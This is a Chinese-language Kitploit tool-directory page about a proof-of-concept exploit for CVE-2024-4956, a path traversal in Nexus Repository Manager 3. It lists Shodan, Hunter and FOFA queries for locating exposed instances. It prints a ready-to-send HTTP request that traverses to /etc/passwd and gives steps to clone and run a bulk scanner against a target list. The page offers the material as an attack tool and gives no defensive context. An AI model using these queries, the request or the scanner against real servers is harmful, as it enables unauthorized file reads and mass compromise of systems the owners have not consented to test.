Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-4956 — CVE-2024-4956 : Nexus Repository Manager 3 PoC 漏洞利用 | Kitploit
工具/GitHubGitHub/goatsecurity/cve-2024-4956
侦察漏洞分析漏洞利用Web应用程序漏洞利用信息收集渗透测试
GitHubgoatsecurity/cve-2024-4956

CVE-2024-4956

CVE-2024-4956 : Nexus Repository Manager 3 PoC 漏洞利用

查看仓库
312年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2024-4956 : Nexus Repository Manager 3

搜索语法:

  • Shodan:http.html:"Nexus Repository"

  • Hunter:product.name="Nexus Repository"

  • FOFA:app="Nexus-Repository-Manager"

Poc :

root@kitploit:~
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: localhost:8081
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Cache-Control: max-age=0

1

或者你也可以使用这个 Python 脚本进行批量扫描:

!将你的目标放入 targets.txt

root@kitploit:~
git clone https://github.com/GoatSecurity/CVE-2024-4956.git
cd CVE-2024-4956
pip install -r requirements.txt
python scan.py

Screenshot

下载工具